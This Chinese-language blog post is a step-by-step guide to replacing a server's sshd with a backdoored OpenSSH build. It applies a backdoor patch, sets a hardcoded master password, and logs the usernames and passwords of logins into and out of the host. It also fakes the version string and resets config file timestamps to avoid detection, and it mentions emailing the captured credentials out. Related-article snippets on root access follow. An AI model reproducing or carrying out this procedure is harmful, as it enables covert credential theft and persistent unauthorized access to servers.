OpenSSH後門獲取root密碼

2021-09-21 00:07:15 字數 2230 閱讀 3752

1. 檢視sshd系統版本

[root@huangzp2 src]# ssh -v

openssh_5.3p1, openssl 1.0.1e-fips 11 feb 2013

2. 解壓版本,其中patch為補丁包

tar -zxvf 0x06-openssh-5.9p1.patch.tar.gz

tar -zxvf openssh-5.9p1.tar.gz

3. 替換補丁檔案,替換前備份檔案

mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old

cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1/

cd openssh-5.9p1

patch < sshbd5.9p1.diff 

# 打補丁就是替換或修改原來的檔案

# 認證

patching file auth-pam.c 

#認證patching file auth-passwd.c

#認證patching file canohost.c

patching file includes.h

patching file log.c

patching file servconf.c 

# 關於sshd服務端

patching file sshconnect2.c 

# 關於sshd連線

patching file sshlogin.c 

# 關於登入,把root密碼記錄下來

patching file version.h

# 關於版本

4. 修改後門密碼和記錄root密碼的資料夾目錄

#define ilog "/usr/share/ifile"  # 記錄錄到本機的使用者名稱和密碼

#define olog "/usr/share/ofile"  # 記錄從本機登入到其他機器的使用者名稱和密碼

#define secretpw "12345678"  # 後門密碼

5. 編輯vim version.h,修改版本號與原來一致

原來:openssh_5.3p1, openssl 1.0.1e-fips 11 feb 2013

6. 編譯安裝

元件:yum install -y openssl openssl-devel pam-devel zlib zlib-devel gcc

./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5

make -j 4 ;make install

--prefix=/usr   # 安裝目錄

--sysconfdir=/etc/ssh   # 指定sshd配置檔案

--with-pam   # pam認證

--with-kerberos5   # kerberos認證

7. 還原新配置檔案為舊配置檔案時間

說明:將ssh_config和sshd_config修改時間跟ssh_config.old和sshd_config.old一致

touch -r/etc/ssh/ssh_config.old /etc/ssh/ssh_config   touch -r/etc/ssh/sshd_config.old /etc/ssh/sshd_config

8. 重啟sshd服務

service sshd restart

9. 驗證並檢視

登入後再次檢視就記錄了密碼,修改了密碼再次登入也會記錄

1)記錄錄到本機的使用者名稱和密碼

2)記錄從本機登入到其他機器的使用者名稱和密碼

3)後門密碼登入

10. 配置自動傳送郵件

........略

參看文獻 

解決OpenSSH公升級後root使用者無法登入的問題

由於系統內建的openssh版本過低,存在一些使用者名稱列舉資訊洩露之類的問題。所以做了一次加固,將openssh的版本公升級到了最新版,即openssh 8.1p1,openssl 1.0.2k fips 但是公升級之後,root使用者就不能登入了。用另乙個具有sudo許可權的使用者登入後,檢視 ...

adb shell獲取root許可權

adb shell獲取root許可權adb push su system bin adb shell chmod 4755 system bin su如果提示read only filesystem,那麼就要重新掛載一下 system,把唯讀掛載成可讀寫,只有手機root了才能執行 mount o ...

root許可權的獲取

ubuntu預設是禁用了root使用者的登陸,在登入視窗只能看到普通使用者和訪客登入。這主要是為了安全考慮。因此,這裡還是推薦只有當要修改系統設定,或安裝軟體時才使用root使用者的許可權。獲得root許可權主要有以下方式 1 終端下臨時使用 root 許可權 直接輸入 sudo 你要執行的命令,根...